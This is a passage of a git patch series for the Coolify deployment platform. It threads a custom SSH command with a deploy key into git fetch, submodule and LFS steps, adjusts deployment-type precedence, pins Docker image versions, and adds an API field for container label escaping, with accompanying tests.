-                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
+                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
             }
         }
         if ($this->settings->is_git_submodules_enabled) {
@@ -1115,10 +1119,10 @@ public function setGitImportSettings(string $deployment_uuid, string $git_clone_
             }
             // Add shallow submodules flag if shallow clone is enabled
             $submoduleFlags = $isShallowCloneEnabled ? '--depth=1' : '';
-            $git_clone_command = "{$git_clone_command} git submodule sync && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git submodule update --init --recursive {$submoduleFlags}; fi";
+            $git_clone_command = "{$git_clone_command} git submodule sync && {$sshCommand} git submodule update --init --recursive {$submoduleFlags}; fi";
         }
         if ($this->settings->is_git_lfs_enabled) {
-            $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git lfs pull";
+            $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} git lfs pull";
         }
 
         return $git_clone_command;
@@ -1407,11 +1411,12 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     $private_key = base64_encode($private_key);
                     $gitlabPort = $gitlabSource->custom_port ?? 22;
                     $escapedCustomRepository = escapeshellarg($customRepository);
-                    $git_clone_command_base = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
+                    $gitlabSshCommand = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\"";
+                    $git_clone_command_base = "{$gitlabSshCommand} {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
                     if ($only_checkout) {
                         $git_clone_command = $git_clone_command_base;
                     } else {
-                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit);
+                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit, git_ssh_command: $gitlabSshCommand);
                     }
                     if ($exec_in_docker) {
                         $commands = collect([
@@ -1477,11 +1482,12 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
             }
             $private_key = base64_encode($private_key);
             $escapedCustomRepository = escapeshellarg($customRepository);
-            $git_clone_command_base = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
+            $deployKeySshCommand = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$customPort} -o Port={$customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\"";
+            $git_clone_command_base = "{$deployKeySshCommand} {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
             if ($only_checkout) {
                 $git_clone_command = $git_clone_command_base;
             } else {
-                $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit);
+                $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit, git_ssh_command: $deployKeySshCommand);
             }
             if ($exec_in_docker) {
                 $commands = collect([
diff --git a/app/Traits/ExecuteRemoteCommand.php b/app/Traits/ExecuteRemoteCommand.php
index a60a47b93..a4ea6abe5 100644
--- a/app/Traits/ExecuteRemoteCommand.php
+++ b/app/Traits/ExecuteRemoteCommand.php
@@ -111,13 +111,6 @@ public function execute_remote_command(...$commands)
                         $attempt++;
                         $delay = $this->calculateRetryDelay($attempt - 1);
 
-                        // Track SSH retry event in Sentry
-                        $this->trackSshRetryEvent($attempt, $maxRetries, $delay, $errorMessage, [
-                            'server' => $this->server->name ?? $this->server->ip ?? 'unknown',
-                            'command' => $this->redact_sensitive_info($command),
-                            'trait' => 'ExecuteRemoteCommand',
-                        ]);
-
                         // Add log entry for the retry
                         if (isset($this->application_deployment_queue)) {
                             $this->addRetryLogEntry($attempt, $maxRetries, $delay, $errorMessage);
diff --git a/tests/Feature/ApplicationRollbackTest.php b/tests/Feature/ApplicationRollbackTest.php
index f62ad6650..61b3505ae 100644
--- a/tests/Feature/ApplicationRollbackTest.php
+++ b/tests/Feature/ApplicationRollbackTest.php
@@ -85,4 +85,62 @@
 
         expect($result)->not->toContain('advice.detachedHead=false checkout');
     });
+
+    test('setGitImportSettings uses provided git_ssh_command for fetch', function () {
+        $this->application->settings->is_git_shallow_clone_enabled = true;
+        $rollbackCommit = 'abc123def456abc123def456abc123def456abc1';
+        $sshCommand = 'GIT_SSH_COMMAND="ssh -o ConnectTimeout=30 -p 22222 -o Port=22222 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa"';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            commit: $rollbackCommit,
+            git_ssh_command: $sshCommand,
+        );
+
+        expect($result)
+            ->toContain('-i /root/.ssh/id_rsa" git fetch --depth=1 origin')
+            ->toContain($rollbackCommit);
+    });
+
+    test('setGitImportSettings uses provided git_ssh_command for submodule update', function () {
+        $this->application->settings->is_git_submodules_enabled = true;
+        $sshCommand = 'GIT_SSH_COMMAND="ssh -o ConnectTimeout=30 -p 22 -o Port=22 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa"';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            git_ssh_command: $sshCommand,
+        );
+
+        expect($result)
+            ->toContain('-i /root/.ssh/id_rsa" git submodule update --init --recursive');
+    });
+
+    test('setGitImportSettings uses provided git_ssh_command for lfs pull', function () {
+        $this->application->settings->is_git_lfs_enabled = true;
+        $sshCommand = 'GIT_SSH_COMMAND="ssh -o ConnectTimeout=30 -p 22 -o Port=22 -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa"';
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            git_ssh_command: $sshCommand,
+        );
+
+        expect($result)->toContain('-i /root/.ssh/id_rsa" git lfs pull');
+    });
+
+    test('setGitImportSettings uses default ssh command when git_ssh_command not provided', function () {
+        $this->application->settings->is_git_lfs_enabled = true;
+
+        $result = $this->application->setGitImportSettings(
+            deployment_uuid: 'test-uuid',
+            git_clone_command: 'git clone',
+            public: true,
+        );
+
+        expect($result)
+            ->toContain('GIT_SSH_COMMAND="ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null" git lfs pull')
+            ->not->toContain('-i /root/.ssh/id_rsa');
+    });
 });

From 0991f8e2ca8a91827547b086f0e2cd7aaee21ad3 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:48:30 +0100
Subject: [PATCH 050/213] fix(application): clarify deployment type precedence
 logic

- Prioritize real private keys (id > 0) first
- Check source second before falling back to zero key
- Remove isDev() check that was restricting zero key behavior in dev
- Remove exception throw, use 'other' as safe fallback
- Expand test coverage to validate all precedence scenarios
---
 app/Models/Application.php                   | 21 ++++++---
 tests/Unit/ApplicationDeploymentTypeTest.php | 47 +++++++++++++++++++-
 2 files changed, 59 insertions(+), 9 deletions(-)

diff --git a/app/Models/Application.php b/app/Models/Application.php
index 9f59445d8..82e4d6311 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -989,17 +989,24 @@ public function isPRDeployable(): bool
 
     public function deploymentType()
     {
-        if (isDev() && data_get($this, 'private_key_id') === 0) {
+        $privateKeyId = data_get($this, 'private_key_id');
+
+        // Real private key (id > 0) always takes precedence
+        if ($privateKeyId !== null && $privateKeyId > 0) {
             return 'deploy_key';
         }
-        if (! is_null(data_get($this, 'private_key_id'))) {
-            return 'deploy_key';
-        } elseif (data_get($this, 'source')) {
+
+        // GitHub/GitLab App source
+        if (data_get($this, 'source')) {
             return 'source';
-        } else {
-            return 'other';
         }
-        throw new \Exception('No deployment type found');
+
+        // Localhost key (id = 0) when no source is configured
+        if ($privateKeyId === 0) {
+            return 'deploy_key';
+        }
+
+        return 'other';
     }
 
     public function could_set_build_commands(): bool
diff --git a/tests/Unit/ApplicationDeploymentTypeTest.php b/tests/Unit/ApplicationDeploymentTypeTest.php
index d240181f1..be7c7d528 100644
--- a/tests/Unit/ApplicationDeploymentTypeTest.php
+++ b/tests/Unit/ApplicationDeploymentTypeTest.php
@@ -1,11 +1,54 @@
 <?php
 
 use App\Models\Application;
+use App\Models\GithubApp;
 
-it('treats zero private key id as deploy key', function () {
-    $application = new Application();
+it('returns deploy_key when private_key_id is a real key', function () {
+    $application = new Application;
+    $application->private_key_id = 5;
+
+    expect($application->deploymentType())->toBe('deploy_key');
+});
+
+it('returns deploy_key when private_key_id is a real key even with source', function () {
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->private_key_id = 5;
+    $application->shouldReceive('getAttribute')->with('source')->andReturn(new GithubApp);
+    $application->shouldReceive('getAttribute')->with('private_key_id')->andReturn(5);
+
+    expect($application->deploymentType())->toBe('deploy_key');
+});
+
+it('returns source when private_key_id is null and source exists', function () {
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->private_key_id = null;
+    $application->shouldReceive('getAttribute')->with('source')->andReturn(new GithubApp);
+    $application->shouldReceive('getAttribute')->with('private_key_id')->andReturn(null);
+
+    expect($application->deploymentType())->toBe('source');
+});
+
+it('returns source when private_key_id is zero and source exists', function () {
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->private_key_id = 0;
+    $application->shouldReceive('getAttribute')->with('source')->andReturn(new GithubApp);
+    $application->shouldReceive('getAttribute')->with('private_key_id')->andReturn(0);
+
+    expect($application->deploymentType())->toBe('source');
+});
+
+it('returns deploy_key when private_key_id is zero and no source', function () {
+    $application = new Application;
     $application->private_key_id = 0;
     $application->source = null;
 
     expect($application->deploymentType())->toBe('deploy_key');
 });
+
+it('returns other when private_key_id is null and no source', function () {
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->shouldReceive('getAttribute')->with('source')->andReturn(null);
+    $application->shouldReceive('getAttribute')->with('private_key_id')->andReturn(null);
+
+    expect($application->deploymentType())->toBe('other');
+});

From aac34f1d149bd31e23533d28cc2e5e77c3a2c26e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 14:19:53 +0100
Subject: [PATCH 051/213] fix(git-import): explicitly specify ssh key and
 remove duplicate validation rules

- Add -i flag to explicitly specify ssh key path in git ls-remote operations
- Remove static $rules properties in favor of dynamic rules() method
- Fix test syntax error
---
 app/Jobs/ApplicationDeploymentJob.php                  |  2 +-
 .../Project/New/GithubPrivateRepositoryDeployKey.php   | 10 ----------
 app/Livewire/Project/New/PublicGitRepository.php       | 10 ----------
 tests/Feature/CommandInjectionSecurityTest.php         |  1 -
 4 files changed, 1 insertion(+), 22 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index b51d04fca..fcd619fd4 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2133,7 +2133,7 @@ private function check_git_if_build_needed()
                     executeInDocker($this->deployment_uuid, 'chmod 600 /root/.ssh/id_rsa'),
                 ],
                 [
-                    executeInDocker($this->deployment_uuid, "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$this->customPort} -o Port={$this->customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git ls-remote {$this->fullRepoUrl} {$lsRemoteRef}"),
+                    executeInDocker($this->deployment_uuid, "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$this->customPort} -o Port={$this->customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git ls-remote {$this->fullRepoUrl} {$lsRemoteRef}"),
                     'hidden' => true,
                     'save' => 'git_commit_sha',
                 ]
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index b9af20c76..e46ad7d78 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -57,16 +57,6 @@ class GithubPrivateRepositoryDeployKey extends Component
 
     private ?string $git_repository = null;
 
-    protected $rules = [
-        'repository_url' => ['required', 'string'],
-        'branch' => ['required', 'string'],
-        'port' => 'required|numeric',
-        'is_static' => 'required|boolean',
-        'publish_directory' => 'nullable|string',
-        'build_pack' => 'required|string',
-        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
-    ];
-
     protected function rules()
     {
         return [
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index cc2510a66..3df31a6a3 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -63,16 +63,6 @@ class PublicGitRepository extends Component
 
     public bool $new_compose_services = false;
 
-    protected $rules = [
-        'repository_url' => ['required', 'string'],
-        'port' => 'required|numeric',
-        'isStatic' => 'required|boolean',
-        'publish_directory' => 'nullable|string',
-        'build_pack' => 'required|string',
-        'base_directory' => 'nullable|string',
-        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
-    ];
-
     protected function rules()
     {
         return [
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index 7047e4bc6..b2df8d1f1 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -169,7 +169,6 @@
 
         expect($validator->fails())->toBeFalse();
     });
-});
 
     test('dockerfile_location validation allows paths with @ for scoped packages', function () {
         $rules = sharedDataApplications();

From 9724d7391dd947da8542ff5a9b7e8b578af18b81 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 14:23:25 +0100
Subject: [PATCH 052/213] feat(seeders): add GitHub deploy key example
 application

---
 database/seeders/ApplicationSeeder.php | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/database/seeders/ApplicationSeeder.php b/database/seeders/ApplicationSeeder.php
index 70fb13a0d..2a0273e0f 100644
--- a/database/seeders/ApplicationSeeder.php
+++ b/database/seeders/ApplicationSeeder.php
@@ -99,6 +99,21 @@ public function run(): void
 CMD ["sh", "-c", "echo Crashing in 5 seconds... && sleep 5 && exit 1"]
 ',
         ]);
+        Application::create([
+            'uuid' => 'github-deploy-key',
+            'name' => 'GitHub Deploy Key Example',
+            'fqdn' => 'http://github-deploy-key.127.0.0.1.sslip.io',
+            'git_repository' => 'git@github.com:coollabsio/coolify-examples-deploy-key.git',
+            'git_branch' => 'main',
+            'build_pack' => 'nixpacks',
+            'ports_exposes' => '80',
+            'environment_id' => 1,
+            'destination_id' => 0,
+            'destination_type' => StandaloneDocker::class,
+            'source_id' => 0,
+            'source_type' => GithubApp::class,
+            'private_key_id' => 1,
+        ]);
         Application::create([
             'uuid' => 'gitlab-deploy-key',
             'name' => 'GitLab Deploy Key Example',

From 2c06223044fcd2f461e814516bbfa82daf488f45 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 14:24:20 +0100
Subject: [PATCH 053/213] docs(settings): clarify Do Not Track helper text

Expand the helper text to explicitly explain that Do Not Track disables both
installation count reporting and error report submission, not just collection
of other data.
---
 resources/views/livewire/settings/advanced.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/settings/advanced.blade.php b/resources/views/livewire/settings/advanced.blade.php
index 3069c8479..242cacf48 100644
--- a/resources/views/livewire/settings/advanced.blade.php
+++ b/resources/views/livewire/settings/advanced.blade.php
@@ -23,7 +23,7 @@ class="flex flex-col h-full gap-8 sm:flex-row">
                     </div>
                     <div class="md:w-96">
                         <x-forms.checkbox instantSave id="do_not_track"
-                            helper="Opt out of reporting this instance to coolify.io's installation count. No other data is collected."
+                            helper="Opt out of anonymous usage tracking. When enabled, this instance will not report to coolify.io's installation count and will not send error reports to help improve Coolify."
                             label="Do Not Track" />
                     </div>
                     <h4 class="pt-4">DNS Settings</h4>

From 9ea8e4dabf17f7cb1b4a7994e76660c48f299482 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 15:10:06 +0100
Subject: [PATCH 054/213] add dataforest sponsor

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index e9ea0e7d4..b2d622167 100644
--- a/README.md
+++ b/README.md
@@ -77,6 +77,7 @@ ### Big Sponsors
 * [Convex](https://convex.link/coolify.io) - Open-source reactive database for web app developers
 * [CubePath](https://cubepath.com/?ref=coolify.io) - Dedicated Servers & Instant Deploy
 * [Darweb](https://darweb.nl/?ref=coolify.io) - 3D CPQ solutions for ecommerce design
+* [Dataforest Cloud](https://cloud.dataforest.net/en?ref=coolify.io) - Deploy cloud servers as seeds independently in seconds. Enterprise hardware, premium network, 100% made in Germany.
 * [Formbricks](https://formbricks.com?ref=coolify.io) - The open source feedback platform
 * [GoldenVM](https://billing.goldenvm.com?ref=coolify.io) - Premium virtual machine hosting solutions
 * [Greptile](https://www.greptile.com?ref=coolify.io) - The AI Code Reviewer

From 21ed8fd300d21ba9b7cdf1503fbdd835161e89d7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 15:10:12 +0100
Subject: [PATCH 055/213] version++

---
 config/constants.php        | 2 +-
 other/nightly/versions.json | 4 ++--
 versions.json               | 4 ++--
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/config/constants.php b/config/constants.php
index 5cb924148..9c6454cae 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -2,7 +2,7 @@
 
 return [
     'coolify' => [
-        'version' => '4.0.0-beta.468',
+        'version' => '4.0.0-beta.469',
         'helper_version' => '1.0.12',
         'realtime_version' => '1.0.11',
         'self_hosted' => env('SELF_HOSTED', true),
diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 7fbe25374..7564f625e 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -1,10 +1,10 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.468"
+            "version": "4.0.0-beta.469"
         },
         "nightly": {
-            "version": "4.0.0-beta.469"
+            "version": "4.0.0"
         },
         "helper": {
             "version": "1.0.12"
diff --git a/versions.json b/versions.json
index 7fbe25374..7564f625e 100644
--- a/versions.json
+++ b/versions.json
@@ -1,10 +1,10 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.468"
+            "version": "4.0.0-beta.469"
         },
         "nightly": {
-            "version": "4.0.0-beta.469"
+            "version": "4.0.0"
         },
         "helper": {
             "version": "1.0.12"

From c3d8f70ebb86afc6c77096b2634c8feff275b217 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 13 Mar 2026 11:19:00 +0530
Subject: [PATCH 056/213] fix(git): GitHub App webhook endpoint defaults to
 IPv4 instead of the instance domain

---
 app/Livewire/Source/Github/Change.php                   | 2 +-
 resources/views/livewire/source/github/change.blade.php | 6 +++---
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/app/Livewire/Source/Github/Change.php b/app/Livewire/Source/Github/Change.php
index 0a38e6088..17323fdec 100644
--- a/app/Livewire/Source/Github/Change.php
+++ b/app/Livewire/Source/Github/Change.php
@@ -239,7 +239,7 @@ public function mount()
             if (isCloud() && ! isDev()) {
                 $this->webhook_endpoint = config('app.url');
             } else {
-                $this->webhook_endpoint = $this->ipv4 ?? '';
+                $this->webhook_endpoint = $this->fqdn ?? $this->ipv4 ?? '';
                 $this->is_system_wide = $this->github_app->is_system_wide;
             }
         } catch (\Throwable $e) {
diff --git a/resources/views/livewire/source/github/change.blade.php b/resources/views/livewire/source/github/change.blade.php
index 53d953aa2..9ccf1e2b7 100644
--- a/resources/views/livewire/source/github/change.blade.php
+++ b/resources/views/livewire/source/github/change.blade.php
@@ -242,15 +242,15 @@ class=""
                             <div class="flex flex-col sm:flex-row items-start sm:items-end gap-2">
                                 <x-forms.select wire:model.live='webhook_endpoint' label="Webhook Endpoint"
                                     helper="All Git webhooks will be sent to this endpoint. <br><br>If you would like to use domain instead of IP address, set your Coolify instance's FQDN in the Settings menu.">
+                                    @if ($fqdn)
+                                        <option value="{{ $fqdn }}">Use {{ $fqdn }}</option>
+                                    @endif
                                     @if ($ipv4)
                                         <option value="{{ $ipv4 }}">Use {{ $ipv4 }}</option>
                                     @endif
                                     @if ($ipv6)
                                         <option value="{{ $ipv6 }}">Use {{ $ipv6 }}</option>
                                     @endif
-                                    @if ($fqdn)
-                                        <option value="{{ $fqdn }}">Use {{ $fqdn }}</option>
-                                    @endif
                                     @if (config('app.url'))
                                         <option value="{{ config('app.url') }}">Use {{ config('app.url') }}</option>
                                     @endif

From f1b8aaed2e1ec99f86b9ea10a1cfe39ea261b294 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 13 Mar 2026 11:40:25 +0530
Subject: [PATCH 057/213] fix(service): hoppscotch fails to start due to db
 unhealthy

---
 templates/compose/hoppscotch.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates/compose/hoppscotch.yaml b/templates/compose/hoppscotch.yaml
index 536a3a215..2f8731c0f 100644
--- a/templates/compose/hoppscotch.yaml
+++ b/templates/compose/hoppscotch.yaml
@@ -7,7 +7,7 @@
 
 services:
   backend:
-    image: hoppscotch/hoppscotch:latest
+    image: hoppscotch/hoppscotch:2026.2.1
     environment:
       - SERVICE_URL_HOPPSCOTCH_80
       - VITE_ALLOWED_AUTH_PROVIDERS=${VITE_ALLOWED_AUTH_PROVIDERS:-GOOGLE,GITHUB,MICROSOFT,EMAIL}
@@ -34,7 +34,7 @@ services:
       retries: 10
 
   hoppscotch-db:
-    image: postgres:latest
+    image: postgres:15
     volumes:
       - postgres_data:/var/lib/postgresql/data
     environment:
@@ -51,7 +51,7 @@ services:
 
   db-migration:
     exclude_from_hc: true
-    image: hoppscotch/hoppscotch:latest
+    image: hoppscotch/hoppscotch:2026.2.1
     depends_on:
       hoppscotch-db:
         condition: service_healthy

From 963e33562183d9c1ec232f85717fbb7a7e25f8d9 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 13 Mar 2026 12:05:06 +0530
Subject: [PATCH 058/213] chore(service): pin castopod service to a static
 version instead of latest

---
 templates/compose/castopod.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/castopod.yaml b/templates/compose/castopod.yaml
index c43f4fba5..8eaed59e5 100644
--- a/templates/compose/castopod.yaml
+++ b/templates/compose/castopod.yaml
@@ -7,7 +7,7 @@
 
 services:
   castopod:
-    image: castopod/castopod:latest
+    image: castopod/castopod:1.15.4
     volumes:
       - castopod-media:/var/www/castopod/public/media
     environment:

From 35eb5cf937b6a7d51799ecee80ab4e95d58d5601 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 13 Mar 2026 12:27:55 +0530
Subject: [PATCH 059/213] chore(service): remove unused attributes on
 imgcompress service

---
 templates/compose/imgcompress.yaml | 2 --
 1 file changed, 2 deletions(-)

diff --git a/templates/compose/imgcompress.yaml b/templates/compose/imgcompress.yaml
index 1046ead59..0fea5a0ff 100644
--- a/templates/compose/imgcompress.yaml
+++ b/templates/compose/imgcompress.yaml
@@ -8,8 +8,6 @@
 services:
   imgcompress:
     image: karimz1/imgcompress:${IMGCOMPRESS_VERSION:-latest}
-    container_name: imgcompress
-    restart: always
     environment:
       - SERVICE_URL_IMGCOMPRESS_5000
       - DISABLE_LOGO=${DISABLE_LOGO:-false}

From c25e59e7edf54994058e0c7c9d599ad761db574c Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 13 Mar 2026 12:28:25 +0530
Subject: [PATCH 060/213] chore(service): pin imgcompress to a static version
 instead of latest

---
 templates/compose/imgcompress.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/imgcompress.yaml b/templates/compose/imgcompress.yaml
index 0fea5a0ff..7cbe4b468 100644
--- a/templates/compose/imgcompress.yaml
+++ b/templates/compose/imgcompress.yaml
@@ -7,7 +7,7 @@
 
 services:
   imgcompress:
-    image: karimz1/imgcompress:${IMGCOMPRESS_VERSION:-latest}
+    image: karimz1/imgcompress:0.6.0
     environment:
       - SERVICE_URL_IMGCOMPRESS_5000
       - DISABLE_LOGO=${DISABLE_LOGO:-false}

From b9cae51c5d774ad14c4c44263c268947c3205acf Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 13 Mar 2026 13:32:58 +0100
Subject: [PATCH 061/213] feat(service): add container label escape control to
 services API

Add `is_container_label_escape_enabled` boolean field to services API,
allowing users to control whether special characters in container labels
are escaped. Defaults to true (escaping enabled).

When disabled, users can use environment variables within labels.
Includes validation rules and comprehensive test coverage.
---
 .../Controllers/Api/ServicesController.php    | 20 ++++-
 .../ServiceContainerLabelEscapeApiTest.php    | 75 +++++++++++++++++++
 2 files changed, 92 insertions(+), 3 deletions(-)
 create mode 100644 tests/Feature/ServiceContainerLabelEscapeApiTest.php

diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index b4fe4e47b..32097443e 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -222,6 +222,7 @@ public function services(Request $request)
                             ),
                         ],
                         'force_domain_override' => ['type' => 'boolean', 'default' => false, 'description' => 'Force domain override even if conflicts are detected.'],
+                        'is_container_label_escape_enabled' => ['type' => 'boolean', 'default' => true, 'description' => 'Escape special characters in labels. By default, $ (and other chars) is escaped. If you want to use env variables inside the labels, turn this off.'],
                     ],
                 ),
             ),
@@ -288,7 +289,7 @@ public function services(Request $request)
     )]
     public function create_service(Request $request)
     {
-        $allowedFields = ['type', 'name', 'description', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'docker_compose_raw', 'urls', 'force_domain_override'];
+        $allowedFields = ['type', 'name', 'description', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'docker_compose_raw', 'urls', 'force_domain_override', 'is_container_label_escape_enabled'];
 
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
@@ -317,6 +318,7 @@ public function create_service(Request $request)
             'urls.*.name' => 'string|required',
             'urls.*.url' => 'string|nullable',
             'force_domain_override' => 'boolean',
+            'is_container_label_escape_enabled' => 'boolean',
         ];
         $validationMessages = [
             'urls.*.array' => 'An item in the urls array has invalid fields. Only name and url fields are supported.',
@@ -429,6 +431,9 @@ public function create_service(Request $request)
                 $service = Service::create($servicePayload);
                 $service->name = $request->name ?? "$oneClickServiceName-".$service->uuid;
                 $service->description = $request->description;
+                if ($request->has('is_container_label_escape_enabled')) {
+                    $service->is_container_label_escape_enabled = $request->boolean('is_container_label_escape_enabled');
+                }
                 $service->save();
                 if ($oneClickDotEnvs?->count() > 0) {
                     $oneClickDotEnvs->each(function ($value) use ($service) {
@@ -485,7 +490,7 @@ public function create_service(Request $request)
 
             return response()->json(['message' => 'Service not found.', 'valid_service_types' => $serviceKeys], 404);
         } elseif (filled($request->docker_compose_raw)) {
-            $allowedFields = ['name', 'description', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'docker_compose_raw', 'connect_to_docker_network', 'urls', 'force_domain_override'];
+            $allowedFields = ['name', 'description', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'docker_compose_raw', 'connect_to_docker_network', 'urls', 'force_domain_override', 'is_container_label_escape_enabled'];
 
             $validationRules = [
                 'project_uuid' => 'string|required',
@@ -503,6 +508,7 @@ public function create_service(Request $request)
                 'urls.*.name' => 'string|required',
                 'urls.*.url' => 'string|nullable',
                 'force_domain_override' => 'boolean',
+                'is_container_label_escape_enabled' => 'boolean',
             ];
